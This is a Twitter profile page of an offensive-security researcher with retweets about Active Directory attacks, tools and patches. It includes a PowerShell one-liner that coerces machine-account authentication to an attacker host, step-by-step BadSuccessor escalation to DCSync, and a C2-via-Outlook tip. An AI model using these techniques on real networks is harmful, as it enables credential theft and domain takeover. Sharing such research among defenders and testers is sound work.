n00py (@n00py1)'s Twitter Profile

Retweeter of InfoSec/Offsec/Pentest/Red Team. Occasional blogger/Independent security research.

ID: 3094485998

https://www.n00py.io/ 17-03-2015 20:12:21

6,6K Tweets

13,13K Followers

963 Following

Mayfly (@m4yfly)

Did you know you didn't need to use a potatoes exploit to go from iis apppool account to admin or system? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Aniq (@aniqfakhrul)

1. Create a dMSA object (badmsa$) under sacrificial VulnOU and targeting Administrator identity. (you need a user with at least CreateChild privilege over an OU) 2. Request a service ticket as badmsa$ 3. Retrieved ticket contains superseded identity's groups 4. DCSync

mpgn (@mpgn_x64)

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥 github.com/Pennyw0rth/Net…

Arun (@dazzyddos)

The original BadSuccessor research by Yuval Gordon was too good to ignore, I couldn't wait to replicate it in my lab. I wrote a short post on operationalizing the technique with real-world, stealthy abuse paths. medium.com/p/429cefc36187

Logan Goins (@_logangoins)

I'm super happy to announce an operationally weaponized version of Yuval Gordon's BadSuccessor in .NET format! With a minimum of "CreateChild" privileges over any OU it allows for automatic escalation to Domain Admin (DA). Enjoy your inline .NET execution! github.com/logangoins/Sha…

Alex Neff (@al3x_n3ff)

NetExec now has native checks for LDAP signing and channel binding capabilities of the target DC, thanks to the implementation of Thomas Seigneuret 🚀 I also fixed querying LDAP with non-ASCII characters, so you can finally query groups such as "Dämonen-Administratoren"🎉

RedTeam Pentesting (@redteampt)

Newer Windows clients often enforce signing ✍️ when using SMB fileshares. To quickly deploy an SMB server with signing supported we implemented this in impacket's smbserver.py based on a prior work by drm. github.com/fortra/impacke…

James Woolley (@xtrato)

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions:

Synacktiv (@synacktiv)

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blogpost by Guillaume André and Wil. synacktiv.com/publications/n…

Pixis (@hackanddo)

I'm not sure everyone realizes it, but as it stands, if you have an Active Directory with default configurations, any machine (except DCs) that hasn't applied the June 10 patch can be compromised by any domain user.

Thomas Seigneuret (@_zblurx)

x.com/RedTeamPT/stat… The efsr_spray module is merged in #NetExec. If you want to coerce an up-to-date Windows 11 and you have a writable share, this will come in handy 😎. Thanks for the PR!

Florian Roth ⚡️ (@cyb3rops)

Yes, LLMs don’t think. Apple’s paper shows they fail at logic. But they guess so well, they already outperform mediocre white-collar work – junior coding, copywriting, design, even legal boilerplate. The risk isn’t in jobs that require real thinking. It’s in the ones where

SpecterOps (@specterops)

Introducing the BloodHound Query Library! 📚 Martin Sohn & Joey Dreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ

Wietze (@wietze)

#HuntingTipOfTheDay: @OddvarMoe of TrustedSec shows how you can run a full C2 implant from Outlook - just setting a few registry keys does the trick. Any activity concerning these registry keys should be considered suspicious. Full story here: youtu.be/7MDHhavM5GM

Melvin langvik (@flangvik)

The incredibly talented gentleman behind pypykatz, minikerberos, msldap, and jackdaw (to name a few) is currently looking for a new opportunity🚒retweet for exposure, best of luck my man!🫶